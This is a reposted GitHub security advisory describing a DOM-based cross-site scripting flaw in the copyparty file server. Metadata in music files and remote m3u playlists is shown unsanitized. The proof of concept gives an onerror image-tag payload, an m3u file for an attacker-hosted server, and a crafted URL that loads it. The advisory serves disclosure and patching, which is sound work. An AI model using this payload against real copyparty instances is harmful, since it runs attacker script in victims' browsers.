copyparty has DOM-Based XSS vulnerability when displaying multimedia metadata

链接: https://github.com/advisories/GHSA-9q4r-x2hj-jmvr

仓库 Star: 5260

CVSS 评分: 5.4

参考链接:

描述:

Summary

An unauthenticated attacker is able to execute arbitrary JavaScript code in a victim’s browser due to improper sanitization of multimedia tags in music files, including m3u files.

Details

Multimedia metadata is rendered in the web-app without sanitization. This can be exploited in two ways:

  • a user which has the necessary permission for uploading files can upload a song with an artist-name such as <img src=x onerror=alert(document.domain)>
  • an unauthenticated user can trick another user into clicking a malicious URL, performing this same exploit using an externally-hosted m3u file

The CVE score and PoC is based on the m3u approach, which results in a higher severity.

PoC

  1. Create a file named song.m3u with the following content. Host this file on an attacker-controlled web server.

    1
    2
    3
    #EXTM3U
    #EXTINF:1,"><img src=x onerror=alert(document.domain)> - "><img src=x onerror=alert(document.domain)>
    http://example.com/audio.mp3
  2. Craft and share the malicious URL:

    1
    http://127.0.0.1:3923/#m3u=https://example.com/song.m3u

Impact

Any user that accesses this malicious URL is impacted.


copyparty has DOM-Based XSS vulnerability when displaying multimedia metadata
http://example.com/2025/07/28/github_2319842536/
作者
lianccc
发布于
2025年7月28日
许可协议